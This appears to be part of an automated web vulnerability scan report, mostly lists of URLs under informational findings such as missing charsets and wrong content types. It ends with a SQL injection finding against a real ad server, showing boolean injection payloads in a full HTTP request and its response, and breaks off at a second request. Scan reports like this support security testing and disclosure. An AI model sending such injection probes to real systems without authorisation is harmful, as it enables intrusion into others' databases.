29.56. http://exch.quantserve.com/pixel/p-ebatsLBTInhYU.gif

29.57. http://feeds.feedburner.com/FashionableHousewife

29.58. http://flash.quantserve.com/quant.swf

29.59. http://fls.doubleclick.net/activityi

29.60. http://gan.doubleclick.net/gan_impression

29.61. http://googleads.g.doubleclick.net/pagead/ads

29.62. http://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js

29.63. http://iar.worthathousandwords.com/iar.gif

29.64. http://idexperts.wufoo.com/embed/z7x4a3/def/embedKey=z7x4a3578302&referrer=

29.65. http://idexpertscorp.com/

29.66. http://images.trulia.com/images/tools/TruliaSnapshot.swf

29.67. http://leads.demandbase.com/in.php

29.68. http://living.glam.com/

29.69. http://loadus.exelator.com/load/

29.70. http://mm.chitika.net/minimall

29.71. http://news.9REDACTED.com.au/js/bld/lcm.js

29.72. http://news.REDACTED/national/8241327/migration-proposal-weak-abbott-says

29.73. http://nmp.newsgator.com/ngbuzz/buzz.ashx

29.74. http://oas.guardian.co.uk/RealMedia/ads/adstream_mjx.ads/www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview/oas.html/1203925231@Top,Middle2,Right1,x31

29.75. http://pixel.invitemedia.com/data_sync

29.76. http://pr.prchecker.info/getpr.php

29.77. http://puma.vizu.com/cdn/00/00/16/49/smart_tag.js

29.78. http://rad.REDACTED.com/ADSAdClient31.dll

29.79. http://s.youtube.com/s

29.80. http://s.ytimg.com/yt/swfbin/apiplayer3-vflDDA3kt.swf

29.81. http://search.twitter.com/search.json

29.82. http://speed.pointroll.com/PointRoll/Media/Banners/Hanes/863117/PTX_300x250_BF.jpg

29.83. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

29.84. http://static.ak.fbcdn.net/connect/xd_proxy.php

29.85. http://support.logrhythm.com/ics/support/default.asp

29.86. https://support.logrhythm.com/

29.87. http://t0.gstatic.com/images

29.88. http://t1.gstatic.com/images

29.89. http://tag.admeld.com/ad/json/100/glammedia/728x90/356541251

29.90. http://thumbs.trulia.com/crossdomain.xml

29.91. http://tracking.quisma.com/v.cfs

29.92. http://twitter.com/statuses/user_timeline/fashionablegal.json

29.93. http://twittercounter.com/counter/

29.94. http://v7.lscache6.c.youtube.com/videoplayback

29.95. http://vincentfretin.ecreall.com/articles/varnish-guru-meditation-on-timeout

29.96. http://whos.amung.us/pingjs/

29.97. http://www.abc.net.au/7.30/content/2011/s3200763.htm

29.98. http://www.afewgoodygumdrops.com/2011/04/few-goody-gumdrops-reviews-christian.html

29.99. http://www.awltovhc.com/image-2932836-10683942

29.100. http://www.blogger.com/dyn-css/authorization.css

29.101. http://www.blogtoplist.com/tracker.php

29.102. http://www.brisbanetimes.com.au/opinion/politics/blogs/gengreens/temporary-protection-visas-are-not-the-answer-20110427-1dwe3.html

29.103. http://www.connect.facebook.com/widgets/fan.php

29.104. http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021

29.105. http://www.facebook.com/plugins/like.php

29.106. http://www.flickr.com/badge_code_v2.gne

29.107. http://www.ftjcfx.com/image-2932836-10731270

29.108. http://www.giveawayscout.com/badge/badge_a

29.109. http://www.glam.com/

29.110. http://www.glam.de/

29.111. http://www.glammedia.com/about_glam/our_story/index.php

29.112. http://www.guardian.co.uk/music/2011/may/01/ray-davies-kinks-meltdown-interview

29.113. http://www.hipaa-101.com/

29.114. http://www.hipaasolutions.org/

29.115. http://www.hipaastore.com/

29.116. https://www.hipaastore.com/min/

29.117. http://www.hostessblog.com/2011/04/royal-wedding-theme-printables-part-2/

29.118. https://www.idexpertscorp.com/dbhc/

29.119. http://www.inspiredelearning.com/privacy/hipaa.privacy.security.htm

29.120. http://www.insurancemgr.com/ppc/health.php

29.121. http://www.islandpacket.com/2011/05/02/1640363/will-killing-osama-kill-the-movement.html

29.122. http://www.logrhythm.com/

29.123. http://www.myspace.com/serverSideIframeModifier.html

29.124. http://www.news.com.au/breaking-news/national/christmas-island-detainee-sews-lips-together/story-e6frfku9-1226044502823

29.125. http://www.nexica.com/error404.aspx

29.126. http://www.oli.co.uk/Maxi-Dresses/Productlist.stm

29.127. http://www.patlive.com/appointment-scheduling/

29.128. http://www.perthnow.com.au/news/western-australia/christmas-island-kill-accused-lashed-out-with-knife/story-e6frg13u-1226046333217

29.129. http://www.playtexbramakeover.com/

29.130. http://www.righthealth.com/topic/What_Is_Hipaa

29.131. http://www.servicemax.com/landing/adwords/aberdeen-scheduling.html

29.132. http://www.sfaxme.com/index.php

29.133. http://www.shadowtrack.com/index.php

29.134. http://www.shareasale.com/r.cfm

29.135. http://www.shopstyle.com/browse

29.136. http://www.simplyyours.co.uk/shop/nav/show.action

29.137. http://www.strausnews.com/articles/2011/05/02/warwick_advertiser/news/25.txt

29.138. http://www.stumbleupon.com/submit

29.139. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

29.140. http://www.tek.com/

29.141. http://www.theage.com.au/national/christmas-island-action-adds-to-villawood-woes-20110425-1du6x.html

29.142. http://www.theaustralian.com.au/news/nation/abbott-a-hero-on-troubled-christmas-island/story-e6frg6nf-1226045245809

29.143. http://www.thehousehuntershandbook.com/public/listingSingle.do

29.144. http://www.theshophound.typepad.com/|http:/www.chicgalleria.com|http:/lastylistmom.com|http:/www.chicgirlstyle.com|http:/blog.sofiawean.com|http:/www.themakeupblogger.com|http:/www.fashioncocktail.com/|http:/theorganicbeautyexpert.typepad.com|http:/thesmartstylist.com|http:/www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

29.145. http://www.topcareerschools.com/s/279-390/12823153/

29.146. http://www.touchnet.com/web/display/TN/Home

29.147. http://www.tqlkg.com/image-2932836-10499952

29.148. http://www.trizetto.com/hpSolutions/hipaa.asp

29.149. http://www.truelocal.com.au/

29.150. http://www.trulia.com/syndication/

29.151. http://www.watoday.com.au/wa-news/hunger-strike-starts-on-christmas-island-20110427-1dw45.html

29.152. http://www.webhostingtalk.com/showthread.php

29.153. http://www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

29.154. http://www.webmgr8.com/index.cfm

29.155. http://www.weichert.com/search/realestate/PropertyListing.aspx

29.156. http://www.youtube.com/apiplayer

29.157. http://www2.glam.com/app/site/affiliate/viewChannelModule.act

29.158. http://www2.idexpertscorp.com/

29.159. http://www2.tek.com/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

29.160. http://www2b.abc.net.au/tmb/Client/MessageBoardList.aspx

29.161. http://www30a2-orig.glam.com/gad/urldata.act

29.162. http://www30a2.glam.com/gad/glamadapt_srv.act

29.163. http://xads.zedo.com/ads3/a

29.164. http://xml.west.REDACTED.overture.com/d/search/p/REDACTED/xml/en-au/v8/

29.165. http://yads.zedo.com/ads3/a

30. Cacheable HTTPS response

30.1. https://admin.iconnection.com/login.aspx

30.2. https://auth.tek.com/mytek/faces/forgotpassword.jsp

30.3. https://auth.tek.com/mytek/faces/loginregistration.jsp

30.4. https://clientcommunity.touchnet.com/web/rest/prototype/1/i18n/com.atlassian.confluence.keyboardshortcuts

30.5. https://clientcommunity.touchnet.com/web/rest/shortcuts/latest/shortcuts/2042/a8e084b1106ae904e4637c50bc8266c4

30.6. https://customer.trizetto.com/OnyxCustomerPortal/

30.7. https://customer.trizetto.com/OnyxCustomerPortal/banner.asp

30.8. https://customer.trizetto.com/OnyxCustomerPortal/home.asp

30.9. https://customer.trizetto.com/OnyxCustomerPortal/login.asp

30.10. https://customer.trizetto.com/OnyxCustomerPortal/menu.asp

30.11. https://idesk.infocrossing.com/

30.12. https://support.logrhythm.com/

30.13. https://support.logrhythm.com/ics/inc/js/portalAjaxGatewayConfig.js

30.14. https://support.logrhythm.com/ics/support/LeftSplash.asp

30.15. https://support.logrhythm.com/ics/support/accounts/5657/top(301116200971767).html

30.16. https://support.logrhythm.com/ics/support/default.asp

30.17. https://support.logrhythm.com/ics/support/mylogin.asp

30.18. https://tracker.i-structure.com/

30.19. https://www.idexpertscorp.com/RADAR/

30.20. https://www.idexpertscorp.com/dbhc/

30.21. https://www.idexpertscorp.com/membership/

30.22. https://www.medicare-solution.com/mss/home/Index.jsp

30.23. https://www1.gotomeeting.com/en_US/javaScriptTester.tmpl

31. HTML does not specify charset

31.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

31.2. http://480-adver-view.c3metrics.com/v.js

31.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390

31.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684

31.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.687

31.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.689

31.7. http://ad.doubleclick.net/adi/N5047.Turn/B5053148.22

31.8. http://ad.doubleclick.net/adi/N5956.Turn/B3941858.17

31.9. http://ad.doubleclick.net.68327.9418.302br.net/jsi/adi/N5047.Turn/B5053148.22

31.10. http://ad.yieldmanager.com/iframe3

31.11. http://ads-vrx.adbrite.com/adserver/display_iab_ads

31.12. http://ads.pointroll.com/PortalServe/

31.13. http://ads.shopstyle.com/

31.14. http://ads.shopstyle.com/sugar-ads/ism/data/

31.15. http://ads.shopstyle.com/sugar-ads/ism/js/

31.16. http://ads.specificmedia.com/serve/v=5

31.17. http://afe.specificclick.net/

31.18. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

31.19. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

31.20. http://amch.questionmarket.com/adscgen/st.php

31.21. http://bidder.mathtag.com/iframe/notify

31.22. http://bs.serving-sys.com/BurstingPipe/adServer.bs

31.23. http://c5.zedo.com/jsc/c5/ff2.html

31.24. http://content.pulse360.com/657ACDD4-3EC6-11E0-8CF0-ED05CB3AF435

31.25. http://d3.zedo.com/jsc/d3/ff2.html

31.26. http://enjmp.com/favicon.ico

31.27. http://enjmp.com/links/

31.28. http://enjmp.com/links/health-insurancemgr.php

31.29. http://fls.doubleclick.net/activityi

31.30. https://idesk.infocrossing.com/

31.31. https://idesk.infocrossing.com/favicon.ico

31.32. http://loadus.exelator.com/load/net.php

31.33. http://media.adfrontiers.com/pq

31.34. http://mediacdn.disqus.com/1304107721/build/system/def.html

31.35. http://mediacdn.disqus.com/1304107721/build/system/reply.html

31.36. http://mediacdn.disqus.com/1304107721/build/system/upload.html

31.37. http://mozo-widgets.f2.com.au/widgets/multiwidget3/SMH/FM-NEWS

31.38. http://mozo-widgets.f2.com.au/widgets/multiwidget3/TA/FM-NEWS

31.39. http://mozo-widgets.f2.com.au/widgets/multiwidget3/WAT/FM-NEWS

31.40. http://optimized-by.rubiconproject.com/a/7845/12566/22544-2.html

31.41. http://optimized-by.rubiconproject.com/a/7845/12566/22544-9.html

31.42. http://optimized-by.rubiconproject.com/a/7845/12566/26835-15.html

31.43. http://panel.kantarmedia.com/0/KantarMedia-Panel/panel/set_panel.html

31.44. http://pixel.invitemedia.com/data_sync

31.45. http://pixel.invitemedia.com/rubicon_sync

31.46. http://rebeccaminkoff.com/linkshare%20banners/classics%202010/RM_linkshare_classic_125x125.jpg

31.47. http://stats.townnews.com/strausnews.com/

31.48. http://stats.townnews.com/thesunchronicle.com/

31.49. https://support.logrhythm.com/

31.50. https://support.logrhythm.com/ics/support/accounts/5657/top(301116200971767).html

31.51. http://tag.contextweb.com/favicon.ico

31.52. http://tags.bluekai.com/site/2312

31.53. http://uac.advertising.com/wrapper/aceUACping.htm

31.54. http://www.abc.net.au/res/abc/submenus.htm

31.55. http://www.bing.com/social/socialwidget/fuse-montage-twitter-widget-v1.htm

31.56. http://www.blogtoplist.com/tracker.php

31.57. http://www.giveawayscout.com/badge/js/

31.58. http://www.glam.com/register

31.59. http://www.glammedia.com/publishers/glam_publisher_network/contract20090526_files/filelist.xml

31.60. http://www.insurancemgr.com/links/health.php

31.61. http://www.myspace.com/serverSideIframeModifier.html

31.62. http://www.news14charlotte.com/images/video/cart_play.gif

31.63. http://www.orgsites.com/md/church-crafts-and-activities/_modules.html

31.64. http://www.playtexbramakeover.com/

31.65. http://www.righthealth.com/javascripts/adore/ad2.html

31.66. http://www.strausnews.com/%22http://art/heading-bg.gif

31.67. http://www.strausnews.com/%22http://art/heading-bg1.gif

31.68. http://www.strausnews.com/%22http://art/page-hzbg.gif

31.69. http://www.strausnews.com/%22http://art/spacer.gif

31.70. http://www.strausnews.com/%22http://art/straus_logo.gif

31.71. http://www.strausnews.com/__utm.gif

31.72. http://www.strausnews.com/dining_guide/include/straus_special.css

31.73. http://www.strausnews.com/favicon.ico

31.74. http://www.tek.com/mytek/

31.75. http://www.thefashionablegal.com/wp-content/themes/lifestyle_40/leaderboard.php

31.76. http://www.thesunchronicle.com/art/mugs/siegel.jpg

31.77. http://www.trizetto.com/company/contactUs.asp

31.78. http://www.trizetto.com/company/corporateProfile.asp

31.79. http://www.trizetto.com/customerEntrance.asp

31.80. http://www.trizetto.com/hpSolutions/coreAdministration.asp

31.81. http://www.trizetto.com/hpSolutions/facets.asp

31.82. http://www.trizetto.com/hpSolutions/hipaa.asp

31.83. http://www.webmd.com/$|wonderwall.REDACTED.com|REDACTED.com/wonderwall|v14.REDACTED.com/|preview.REDACTED.com/|www.REDACTED.com/preview.aspx|mtv.com/videos/|mtv.com/

31.84. http://www15.glam.com/glamIgm.act

31.85. http://www15.glam.com/template/glamtv_199269041.php

31.86. http://www30a2.glam.com/gad/click.act

31.87. http://www30a2.glam.com/gad/noscript.act

31.88. http://xads.zedo.com/ads3/a

31.89. http://xss.cx/2011/05/02/dork/sql-injection-database-error-cwe89-capec66-dork-ghdb-www2idexpertscorpcom.html

31.90. http://yads.zedo.com/ads3/a

32. HTML uses unrecognised charset

33. Content type incorrectly stated

33.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

33.2. http://480-adver-view.c3metrics.com/v.js

33.3. http://a.rad.REDACTED.com/ADSAdClient31.dll

33.4. http://ads.pointroll.com/PortalServe/

33.5. http://ads.shopstyle.com/

33.6. http://ads.shopstyle.com/sugar-ads/ism/data/

33.7. http://ads.shopstyle.com/sugar-ads/ism/js/

33.8. http://afe.specificclick.net/

33.9. http://altfarm.mediaplex.com/ad/js/13001-83639-12284-11

33.10. http://altfarm.mediaplex.com/ad/js/13966-95815-19269-5

33.11. http://amch.questionmarket.com/adscgen/st.php

33.12. http://ar.voicefive.com/b/rc.pli

33.13. http://arts.onbloglist.com/img12.php

33.14. http://b.rad.REDACTED.com/ADSAdClient31.dll

33.15. http://bs.serving-sys.com/BurstingPipe/adServer.bs

33.16. http://cdn.doubleverify.com/966952&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=6&plc=1278397&sid=glamcom&adid=

33.17. http://cdn.doubleverify.com/966952&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=6&plc=1278398&sid=glamcom&adid=

33.18. http://cdn.doubleverify.com/966952&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=6&plc=1278431&sid=quantcas&adid=

33.19. https://clientcommunity.touchnet.com/web/rest/prototype/1/i18n/com.atlassian.confluence.keyboardshortcuts

33.20. http://clients1.google.com/complete/search

33.21. http://content.pulse360.com/657ACDD4-3EC6-11E0-8CF0-ED05CB3AF435

33.22. http://d3fd89.r.axf8.net/mr/a.gif

33.23. http://data.REDACTED/ugc/UGCPortal.aspx

33.24. http://delb.opt.fimserve.com/adopt/

33.25. http://engine.cmmeglobal.com/v1/request

33.26. http://event.adxpose.com/event.flow

33.27. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1895483445

33.28. http://feed.video.news.com.au/f/g5OqK/nr5Z4uX_htDc/1905619982

33.29. http://feeds.glam.com/blogs/latest/

33.30. http://feeds.glam.com/blogs/latest/Beauty

33.31. http://feeds.glam.com/blogs/latest/Fashion

33.32. http://jobs.orbitcast.com/a/jbb/find-jobs-json/jbb_widget_list_jobposts/5

33.33. http://js.worthathousandwords.com/IA.jsh

33.34. http://lp.idexpertscorp.com/hitech-whitepapera/bg-grad-fade-edge-ul.original.png

33.35. http://mediacdn.disqus.com/1304107721/fonts/disqus-webfont.woff

33.36. http://mediaforce.sitescout.netdna-cdn.com/ad150-594280c.jpg

33.37. http://ndm.feeds.theplatform.com/ps/JSON/PortalService/2.1/getReleaseList

33.38. http://news.REDACTED/flock/flock44.aspx

33.39. http://news.REDACTED/flock/flockupdate.aspx

33.40. http://news.xinhuanet.com/favicon.ico

33.41. http://REDACTED/share/com/header_v10/renderPersonalisation.aspx

33.42. http://rad.REDACTED.com/ADSAdClient31.dll

33.43. http://resources.news.com.au/cs/dailytelegraph/images/favicon.ico

33.44. http://resources.news.com.au/cs/newscomau/images/favicon.ico

33.45. http://resources.news.com.au/cs/perthnow/images/favicon.ico

33.46. http://resources.news.com.au/cs/theaustralian/images/favicon.ico

33.47. http://resources1.news.com.au/images/2011/04/29/1226046/937813-house-for-sale-signs.gif

33.48. http://rt.disqus.com/forums/realtime-cached.js

33.49. https://support.logrhythm.com/ics/inc/js/portalAjaxGatewayConfig.js

33.50. http://vms.REDACTED.com/vms.aspx

33.51. http://whos.amung.us/pingjs/

33.52. http://widget.linkwithin.com/show_widget

33.53. http://widget2.linkwithin.com/show_widget

33.54. http://www.abc.net.au/favicon.ico

33.55. http://www.abc.net.au/res/abc/submenus.htm

33.56. http://www.blogtoplist.com/tracker.php

33.57. http://www.brisbanetimes.com.au/action/pingServerAction

33.58. http://www.brisbanetimes.com.au/favicon.ico

33.59. http://www.facebook.com/extern/login_status.php

33.60. http://www.giveawayscout.com/badge/js/

33.61. http://www.glam.com/logincheck.php

33.62. http://www.google.com/realtimejs

33.63. http://www.google.com/recaptcha/api/reload

33.64. http://www.google.com/search

33.65. https://www.idexpertscorp.com/RADAR/

33.66. https://www.idexpertscorp.com/dbhc/

33.67. http://www.isecauditors.com/images/favicon.ico

33.68. http://www.isecauditors.com/images/fondo_isec.jpg

33.69. http://www.medicare-solution.com/favicon.ico

33.70. http://www.orgsites.com/az/marchingrams/Doc1.docx

33.71. http://www.orgsites.com/ca/buddhism/boddhis.jpg

33.72. http://www.orgsites.com/il/rlmscheer/IMG_20110109_144130.jpg

33.73. http://www.orgsites.com/images/bg/bg31.gif

33.74. http://www.orgsites.com/md/church-crafts-and-activities/mountain_and_lake.jpg

33.75. http://www.orgsites.com/ny/bellporthighschoolptsa/April.WMF

33.76. http://www.orgsites.com/ny/bellporthighschoolptsa/Spring.WMF

33.77. http://www.orgsites.com/tx/americanlegion-post-unit-121/auxemb.jpg

33.78. http://www.orgsites.com/tx/txredhatroadrunners/j0424646.wmf

33.79. http://www.smh.com.au/action/pingServerAction

33.80. http://www.smh.com.au/favicon.ico

33.81. http://www.tek.com/cgi-bin/form/form.cgi

33.82. http://www.theage.com.au/action/pingServerAction

33.83. http://www.theage.com.au/favicon.ico

33.84. http://www.touchnet.com/web/rest/prototype/1/i18n/com.atlassian.confluence.keyboardshortcuts

33.85. http://www.trulia.com/homeroll/MA/Rehoboth/

33.86. http://www.vpswebserver.com/livezilla/server.php

33.87. http://www.watoday.com.au/action/pingServerAction

33.88. http://www.wiseshop.com/favicon.ico

33.89. http://www.wiseshop.com/includes/fonts/delicious-bold-webfont.woff

33.90. http://www.wiseshop.com/includes/fonts/delicious-heavy-webfont.woff

33.91. http://www.wiseshop.com/includes/fonts/delicious-roman-webfont.woff

33.92. http://www.wiseshop.com/solo/ajax/likes

33.93. http://www.xinhuanet.com/english2010/static/check.js

33.94. https://www1.gotomeeting.com/en_US/javaScriptTester.tmpl

33.95. http://www15.glam.com/glamIgm.act

33.96. http://www2.idexpertscorp.com/favicon.ico

33.97. http://www24a.glam.com/appdir/resources/rendergadget.js

33.98. http://www25.glam.com/appdir/resources/rendergadget.js

33.99. http://www3.tinker.com/event_timeline/

33.100. http://www35.glam.com/favicon.ico

33.101. http://www35t.glam.com/favicon.ico

33.102. http://www4.tinker.com/standard/event_timeline/

34. Content type is not specified

34.1. http://ad.yieldmanager.com/st

34.2. http://media.trafficmp.com/a/js

34.3. http://pcm1.map.pulsemgr.com/uds/pc

34.4. http://pcm2.map.pulsemgr.com/uds/pc

34.5. http://pcm3.map.pulsemgr.com/uds/pc

34.6. http://www.ucafunds.com.au/ugf/x27

34.7. http://www25.glam.com/files/gadget-store/installs/84371626942385/flvpath_2-73131245.flv



1. SQL injection  next
There are 43 instances of this issue:


1.1. http://ads2.adbrite.com/v0/ad [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /v0/ad?sid=1545288&zs=3732385f3930&ifr=1&ref=http%3A%2F%2Fwww.dailytelegraph.com.au%2Fnews%2Fbreaking-news%2Ftony-abbott-says-migration-proposals-are-weak%2Fstory-e6freuz0-1226045133021%3Ffrom%3Dpublic_rss&zx=1020&zy=22&ww=1041&wh=903&fl=1&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.dailytelegraph.com.au/news/breaking-news/tony-abbott-says-migration-proposals-are-weak/story-e6freuz0-1226045133021?from=public_rss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; srh="1%3Aq64FAA%3D%3D"; ut="1%3AXZBJEoMgEEXvwpoFQxwqtxFBJSJGQS21vXswxlTM9v33u7p7RSND9xXVap7aXjp0R3lVpWVHshFoZ0rfAAOBndaWB9AIkgAFAvRRE4LzykY1i3x5RCq4TOKu48sUSMp7EwiNTq9oL95Jmwt1RhkTiPBTCwnEgn9F%2B1c3sZ7j204lGcy%2B16nq6DozYzLb76lSd6w%2FtAQ75noK9DkX1kKIqV8%2B%2FTjJf%2FsII5FZq3r9%2FhDathc%3D"; b="%3A%3Ax4cw%2Cx4co%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; rb=0:682865:20838240:null:0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQlvOljAoYtq6d4BMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C83ol2%2C1uo0%7Clkjpss%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C84y2m%2C1uo0%7Clkjpt2%2C826ke%2C1uo0%7Clkjpsr%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: b="%3A%3Ax4co%2Cx4cw%2Cx4cn%2C12gg8%2C12ggb%2C6e73"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:57 GMT
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo0CgY2ODQzMzkY5Y3LuQsiJDRkYWI3ZDM1LWIxZDItOTE1YS1kM2MwLTlkNTdmOWM2NmIwNwo0CgY3MTEzODQYiP7KzRMiJGMxZTEzMDFlLTNhMWYtNGNhNy05ODcwLWY2MzZiNWYxMGU2NgojCgY3NDI2OTcY8rjOrAwiEzI5MzExNDI5NjE2NDY2MzQ3NzUKJAoGNzUzMjkyGNCZ6o0TIhRBTS0wMDAwMDAwMDAzMDYyMDQ1Mgo2CgY3NjI3MDEQn_3NjAoYv7jF4BMiIDk3ODk3MkRGQTA2MzAwMEQyQzBFN0EzODBCRkExREVDCiEKBjc3OTA0NRjPwZngEyIRMTc2NDcxMDgwMDYwMzQwODkKFgoGNzgyNjA2EIC7iqMKGICT7M0TIgAKNAoGODA2MjA1GMDJhpkVIiQwYzJhZWRlNi02YmI2LTExZTAtOGZlNi0wMDI1OTAwYThmZmUKNAoGODEwNjQ3GMnBh4REIiQ1NDkxODhhMS1hMDdjLTQyMzEtYmU5NC03ZjcyNWUxYTE5ZjcKMAoGODMwNjk3GIvXg80OIiA5UVF4Y1RPNXVIMklhN0JrNHZHUzJTOTZ1Zk9Hc1NEQxAB; path=/; domain=.adbrite.com; expires=Sun, 31-Jul-2011 12:58:57 GMT
Set-Cookie: vsd=0@1@4dbeaa91@www.dailytelegraph.com.au; path=/; domain=.adbrite.com; expires=Wed, 04-May-2011 12:58:57 GMT
Set-Cookie: fq="7l04r%2C1uo0%7Clkjpsr%2C80kpw%2C1uo0%7Clkkjk6%2C8721s%2C1uo0%7Clkkjgh%7Clkkjhg%7Clkkjhn%7Clkkjhq%7Clkkjk1%2C83ol2%2C1uo0%7Clkjpss%2C826ke%2C1uo0%7Clkjpsr%2C84y2m%2C1uo0%7Clkjpt2%2C86eg6%2C1uo0%7Clkkk29%2C86xsv%2C1uo0%7Clkkjk7%7Clkkjke%7Clkkjkh"; path=/; domain=.adbrite.com; expires=Tue, 01-May-2012 12:58:57 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Mon, 02 May 2011 12:58:57 GMT
Content-Length: 2784

var AdBrite_Title_Color_Default = '0000FF';
var AdBrite_Text_Color_Default = '000000';
var AdBrite_Background_Color_Default = 'FFFFFF';
var AdBrite_Border_Color_Default = 'CCCCCC';
var AdBrite_URL_Color_Default = '008000';
function AdBrite_IAB_Zone_Test_Color(color) {
if (typeof(color) != 'string') return false;
if (!color.match(/^[0-9A-Fa-f]{6}$/) && !color.match(/^[0-9A-Fa-f]{3}$/)) return false;
return color;
}
var AdBrite_Title_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Title_Color);
var AdBrite_Text_Color = AdBrite_IAB_Zone_Test_Color(AdBrite_Text_Color)
...[SNIP]...

Request 2

